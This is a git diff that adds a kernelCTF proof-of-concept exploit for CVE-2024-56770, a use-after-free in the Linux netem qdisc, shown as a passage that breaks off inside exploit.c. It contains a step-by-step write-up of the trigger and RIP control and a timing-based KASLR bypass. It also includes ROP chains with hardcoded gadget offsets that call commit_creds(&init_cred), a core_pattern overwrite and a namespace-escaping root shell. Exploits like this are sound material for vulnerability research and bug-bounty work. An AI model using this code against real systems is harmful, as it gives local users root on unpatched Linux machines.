diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md new file mode 100644 index 000000000..137818aec --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md @@ -0,0 +1,355 @@ +# Overview + +In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc [1], the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. + +```c +static struct sk_buff *netem_dequeue(struct Qdisc *sch) +{ + struct netem_sched_data *q = qdisc_priv(sch); + struct sk_buff *skb; + +tfifo_dequeue: + skb = __qdisc_dequeue_head(&sch->q); + if (skb) { + qdisc_qstats_backlog_dec(sch, skb); +deliver: + qdisc_bstats_update(sch, skb); + return skb; + } + skb = netem_peek(q); + if (skb) { + u64 time_to_send; + u64 now = ktime_get_ns(); + + /* if more time remaining? */ + time_to_send = netem_skb_cb(skb)->time_to_send; + if (q->slot.slot_next && q->slot.slot_next < time_to_send) + get_slot_next(q, now); + + if (time_to_send <= now && q->slot.slot_next <= now) { + netem_erase_head(q, skb); + sch->q.qlen--; + qdisc_qstats_backlog_dec(sch, skb); + skb->next = NULL; + skb->prev = NULL; + /* skb->dev shares skb->rbnode area, + * we need to restore its value. + */ + skb->dev = qdisc_dev(sch); + + if (q->slot.slot_next) { + q->slot.packets_left--; + q->slot.bytes_left -= qdisc_pkt_len(skb); + if (q->slot.packets_left <= 0 || + q->slot.bytes_left <= 0) + get_slot_next(q, now); + } + + if (q->qdisc) { + unsigned int pkt_len = qdisc_pkt_len(skb); + struct sk_buff *to_free = NULL; + int err; + + err = qdisc_enqueue(skb, q->qdisc, &to_free); // [1] + kfree_skb_list(to_free); + if (err != NET_XMIT_SUCCESS && + net_xmit_drop_count(err)) { + qdisc_qstats_drop(sch); + qdisc_tree_reduce_backlog(sch, 1, + pkt_len); + } + goto tfifo_dequeue; + } + goto deliver; + } + + if (q->qdisc) { + skb = q->qdisc->ops->dequeue(q->qdisc); + if (skb) + goto deliver; + } + + qdisc_watchdog_schedule_ns(&q->watchdog, + max(time_to_send, + q->slot.slot_next)); + } + + if (q->qdisc) { + skb = q->qdisc->ops->dequeue(q->qdisc); + if (skb) + goto deliver; + } + return NULL; +} +``` + +We can trigger the UAF as follows. + +- Create a Qdisc DRR `1:` +- Create a Class DRR `1:1` + +- Create a Qdisc DRR `2:` as a child of `1:1` +- Create a Class DRR `2:1` +- Create a Class DRR `2:2` + +- Create a Qdisc NetEM `3:` as a child of `2:1` + +- Create a Qdisc TBF `4:` as a child of `3:` + +- Create a Qdisc NetEM `5:` as a child of `2:2` + +- Send a packet to `2:1` +- Send a packet to `2:1` + +- Delete the Class DRR `2:1` + +- Send a packet to `2:2` + +- Delete the Class DRR `1:1` + +- Send a packet to trigger the UAF + +# KASLR Bypass + +We used a timing side channel attack to leak the kernel base. + +# RIP Control + +RIP is controlled in `drr_dequeue()`. + +```c +static struct sk_buff *drr_dequeue(struct Qdisc *sch) + { + struct drr_sched *q = qdisc_priv(sch); + struct drr_class *cl; + struct sk_buff *skb; + unsigned int len; + + if (list_empty(&q->active)) + goto out; + while (1) { + cl = list_first_entry(&q->active, struct drr_class, alist); + skb = cl->qdisc->ops->peek(cl->qdisc); // [2] + if (skb == NULL) { + qdisc_warn_nonwc(__func__, cl->qdisc); + goto out; + } +``` + +When the DRR Qdisc class is deleted, both `cl` and `cl->qdisc` are freed. At this point, with both freed, `cl` is left in its freed state and a fake qdisc is sprayed onto `cl->qdisc`. This allows control over the RIP when `cl->qdisc->ops->peek` is called [2]. Setting the fake qdisc's ops to `drr_qdisc_ops` causes the `peek` function below to be invoked. + +```c +static inline struct sk_buff *qdisc_peek_dequeued(struct Qdisc *sch) +{ + struct sk_buff *skb = skb_peek(&sch->gso_skb); + + /* we can reuse ->gso_skb because peek isn't called for root qdiscs */ + if (!skb) { + skb = sch->dequeue(sch); // [3] + + if (skb) { + __skb_queue_head(&sch->gso_skb, skb); + /* it's still part of the queue */ + qdisc_qstats_backlog_inc(sch, skb); + sch->q.qlen++; + } + } + + return skb; +} +``` + +In `qdisc_peek_dequeued()`, if `sch->gso_skb` is `0`, `sch->dequeue` is called [3]. Since `sch->dequeue` corresponds to the 0x8 offset in `struct Qdisc`, a stack pivot gadget can be stored at this location to perform ROP. + +We allocate the `user_key_payload` and `ctl_buf` objects into `kmalloc-512` for the fake Qdisc spray. + +For mitigation kernel, we use multiq Qdisc to bypass mitigations. We allocate the multiq Qdisc to `cl->qdisc`. + +```c +static int multiq_init(struct Qdisc *sch, struct nlattr *opt, + struct netlink_ext_ack *extack) +{ + struct multiq_sched_data *q = qdisc_priv(sch); + int i, err; + + q->queues = NULL; + + if (!opt) + return -EINVAL; + + err = tcf_block_get(&q->block, &q->filter_list, sch, extack); + if (err) + return err; + + q->max_bands = qdisc_dev(sch)->num_tx_queues; + + q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4] + if (!q->queues) + return -ENOBUFS; + for (i = 0; i < q->max_bands; i++) + q->queues[i] = &noop_qdisc; + + return multiq_tune(sch, opt, extack); +} +``` + +When initializing the multiq Qdisc, `q->queues` is allocated in `multiq_init()` [4]. At this point, the object size can be controlled to be `q->max_bands*sizeof(struct Qdisc *)`. Since `q->max_bands` is a user-controllable value, an object of any desired size can be allocated. To bypass mitigation, allocate an object larger than `0x2000`, which uses the page allocator. Then, delete the multiq Qdisc and allocate the `ctl_buf` objects into the freed `q->queues`. + +```c +static struct sk_buff *multiq_peek(struct Qdisc *sch) +{ + struct multiq_sched_data *q = qdisc_priv(sch); + unsigned int curband = q->curband; + struct Qdisc *qdisc; + struct sk_buff *skb; + int band; + + for (band = 0; band < q->bands; band++) { + /* cycle through bands to ensure fairness */ + curband++; + if (curband >= q->bands) + curband = 0; + + /* Check that target subqueue is available before + * pulling an skb to avoid head-of-line blocking. + */ + if (!netif_xmit_stopped( + netdev_get_tx_queue(qdisc_dev(sch), curband))) { + qdisc = q->queues[curband]; + skb = qdisc->ops->peek(qdisc); // [5] + if (skb) + return skb; + } + } + return NULL; + +} +``` + +Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`. It then references `q->queues` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, it overwrites `q->queues[]` with the address of the `cpu_entry_area`. As a result, `qdisc->ops` can also be set to an address within `cpu_entry_area`, and finally, the RIP can be controlled. + +# Post-RIP + +For COS kernel, the ROP payload is stored in `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RBP` points to the `struct Qdisc+0x80`. + +```c +void rop_chain(uint64_t* data){ + int i = 0; + + data[i++] = 0; // enqueue + data[i++] = kbase + MOV_RSP_RBP_POP_RBP_RET; // dequeue + + data[i++] = 0; // keylen + data[i++] = kbase + DRR_QDISC_OPS; // ops + + i += 12; + + data[i++] = 0; // gsoskb.next + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} +``` + +For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows. + +```c +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { + if (fork()) { + return; + } + + struct cpu_entry_area_payload payload = {}; + + payload.regs[0] = kbase + QDISC_RESET; // multiq->ops->peek + payload.regs[1] = kbase + POP_POP_RET; + payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset + payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF ; // fake ops + payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET; + payload.regs[5] = kbase + CORE_PATTERN; + payload.regs[6] = MMAP_ADDR; + payload.regs[7] = strlen((char*)MMAP_ADDR); + payload.regs[8] = 0; + payload.regs[9] = kbase + COPY_FROM_USER; + payload.regs[10] = kbase + MSLEEP; + + set_affinity(1); + signal(SIGFPE, sig_handler); + signal(SIGTRAP, sig_handler); + signal(SIGSEGV, sig_handler); + setsid(); + + while(1){ + write_cpu_entry_area(&payload); + usleep(1000); + } +} +``` + +When RIP is controlled, `qdisc_reset()` is called first. + +```c +void qdisc_reset(struct Qdisc *qdisc) +{ + const struct Qdisc_ops *ops = qdisc->ops; + + trace_qdisc_reset(qdisc); + + if (ops->reset) + ops->reset(qdisc); // [6] + + __skb_queue_purge(&qdisc->gso_skb); + __skb_queue_purge(&qdisc->skb_bad_txq); + + qdisc->q.qlen = 0; + qdisc->qstats.backlog = 0; +} +``` + +In `qdisc_reset()`, `ops->reset()` is called with the address of the `cpu_entry_area` in the `RBX` register [6]. Therefore, ROP can be performed by modifying `ops->reset()` into a stack pivot gadget. The `core_pattern` overwrite technique is used to gain root shell access. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/vulnerability.md new file mode 100644 index 000000000..7e78d21bb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,13 @@ +- Requirements: + - Capabilities: CAP_NET_ADMIN, CAP_NET_RAW + - Kernel configuration: CONFIG_NET_SCHED, CONFIG_NET_SCH_NETEM + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50612537e9ab (netem: fix classful handling +) +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f8d4bc455047cf3903cd6f85f49978987dbb3027 (net/sched: netem: account for backlog updates from child qdisc) +- Affected Version: v3.3 - v6.13-rc2 +- Affected Component: net/sched +- Cause: Use-After-Free +- Syscall to disable: disallow unprivileged username space +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-56770 +- Description: In the Linux kernel, the following vulnerability has been resolved: net/sched: netem: account for backlog updates from child qdisc In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc, the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. If 'qlen' reaches the configured sch->limit, the enqueue function stops working, even though the tfifo is not full. Reproduce the bug: Ensure that the sender machine has GSO enabled. Configure netem as root qdisc and tbf as its child on the outgoing interface of the machine as follows: $ tc qdisc add dev root handle 1: netem delay 100ms limit 100 $ tc qdisc add dev parent 1:0 tbf rate 50Mbit burst 1542 latency 50ms Send bulk TCP traffic out via this interface, e.g., by running an iPerf3 client on the machine. Check the qdisc statistics: $ tc -s qdisc show dev Statistics after 10s of iPerf3 TCP test before the fix (note that netem's backlog > limit, netem stopped accepting packets): qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 2767766 bytes 1848 pkt (dropped 652, overlimits 0 requeues 0) backlog 4294528236b 1155p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 2767766 bytes 1848 pkt (dropped 327, overlimits 7601 requeues 0) backlog 0b 0p requeues 0 Statistics after the fix: qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 37766372 bytes 24974 pkt (dropped 9, overlimits 0 requeues 0) backlog 0b 0p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 37766372 bytes 24974 pkt (dropped 327, overlimits 96017 requeues 0) backlog 0b 0p requeues 0 tbf segments the GSO SKBs (tbf_segment) and updates the netem's 'qlen'. The interface fully stops transferring packets and "locks". In this case, the child qdisc and tfifo are empty, but 'qlen' indicates the tfifo is at its limit and no more packets are accepted. This patch adds a counter for the entries in the tfifo. Netem's 'qlen' is only decreased when a packet is returned by its dequeue function, and not during enqueuing into the child qdisc. External updates to 'qlen' are thus accounted for and only the behavior of the backlog statistics changes. As in other qdiscs, 'qlen' then keeps track of how many packets are held in netem and all of its children. As before, sch->limit remains as the maximum number of packets in the tfifo. The same applies to netem's backlog statistics. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/Makefile b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/Makefile new file mode 100644 index 000000000..00b0521c3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/Makefile @@ -0,0 +1,5 @@ +exploit: + gcc -o exploit ./exploit.c -lkeyutils -static + +prerequisites: + sudo apt-get install libkeyutils-dev \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit new file mode 100755 index 000000000..abcc5cc04 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit.c b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit.c new file mode 100644 index 000000000..7c53f70ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit.c @@ -0,0 +1,1001 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include + +int sockfd = -1; + +uint64_t kbase = 0xffffffff81000000; + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch(void* p) +{ + asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +size_t bypass_kaslr(uint64_t base) +{ + if (!base) + { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) + { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) + { + if (times[ti] < minv) + { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) + { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 15 +// largest contiguous mapped area at the beginning of _stext +#define WINDOW_SIZE 11 + + while (1) + { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) + { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) + { + sum += times[ti + i]; + } + if (sum > max) + { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + if ((base % 0x1000000) == 0) + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + kbase = base; + + return 0; +} + +void win(){ + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag ; /bin/sh", + NULL, + }; + + execve(shell[0], shell, NULL); + + while(1); +} + +uint64_t _user_rip = (uint64_t) win; +uint64_t _user_cs = 0; +uint64_t _user_rflags = 0; +uint64_t _user_sp = 0; +uint64_t _user_ss = 0; + +void save_state(void) { + __asm__(".intel_syntax noprefix;" + "mov _user_cs, cs;" + "mov _user_ss, ss;" + "mov _user_sp, rsp;" + "pushf;" + "pop _user_rflags;" + ".att_syntax"); + return; +} + +#define FIND_TASK_BY_VPID 0x1cc360 +#define SWITCH_TASK_NAMESPACES 0x1d4090 +#define COMMIT_CREDS 0x1d5c10 +#define INIT_CRED 0x2876b40 +#define INIT_NSPROXY 0x2876900 +#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0x14011c6 +#define OOPS_IN_PROGRESS 0x3511b78 +#define DRR_QDISC_OPS 0x2b8ade0 +#define RCU_READ_LOCK_NESTING_OFF 0x474 // struct task_struct + +#define PUSH_RDI_POP_RSP_RET 0xe9a9ff // push rdi ; add byte ptr [r9], sil ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; jmp 0xffffffff82605040 +#define POP_POP_POP_RET 0xfa36c2 // pop r10 ; pop r12 ; pop rbp ; jmp 0xffffffff82605040 +#define POP_RDI_RET 0x048dea // pop rdi ; jmp 0xffffffff82605040 +#define POP_RSI_RET 0x208d48 // pop rsi ; jmp 0xffffffff82605040 +#define ADD_RAX_RSI_RET 0x03cf10 // add rax, rsi ; jmp 0xffffffff82605040 +#define POP_RCX_RET 0x02d35c // pop rcx ; jmp 0xffffffff82605040 +#define MOV_RAX_RCX_RET 0x77004b // mov qword ptr [rax], rcx ; jmp 0xffffffff82605040 +#define MOV_RDI_RAX_RET 0x12bebdb // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82605040 +#define MOV_RSI_RDI_RET 0x3111b9 // mov qword ptr [rsi], rdi ; jmp 0xffffffff8245ee20 + + +void rop_chain(uint64_t* data){ + int i = 0; + + data[i++] = kbase + POP_POP_POP_RET; // enqueue + data[i++] = kbase + PUSH_RDI_POP_RSP_RET; // dequeue + + data[i++] = 0; // keylen + data[i++] = kbase + DRR_QDISC_OPS; // ops + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; // gsoskb.next + + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} + +void write_file(const char *filename, char *text) { + int fd = open(filename, O_RDWR | O_CREAT, 0600); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); +} + +void set_affinity(int cpuid){ + cpu_set_t my_set; + int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN); + + if (cpu_cores == 1) return; + + CPU_ZERO(&my_set); + + CPU_SET(cpuid, &my_set); + + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } +} + +#define NETLINK_BUFSIZE 4096 + +int ip_link_lo_up() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + req.ifinfo.ifi_change = 0xFFFFFFFF; + req.ifinfo.ifi_flags = IFF_UP | IFF_RUNNING; + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + return -1; + } + + close(sock); + return 0; +} + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +#define NLMSG_TAIL(nmsg) \ + ((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len))) + +int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data, + int alen) { + int len = RTA_LENGTH(alen); + struct rtattr *rta; + + if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) { + fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen); + return -1; + } + rta = NLMSG_TAIL(n); + rta->rta_type = type; + rta->rta_len = len; + if (alen) + memcpy(RTA_DATA(rta), data, alen); + n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len); + return 0; +} + +struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type) { + struct rtattr *nest = NLMSG_TAIL(n); + + addattr_l(n, maxlen, type, NULL, 0); + return nest; +} + +int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest) { + nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest; + return n->nlmsg_len; +} + +int add_qdisc_drr(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "drr", 4); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_netem(int fd, uint32_t parent, uint32_t handle, int64_t latency) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, 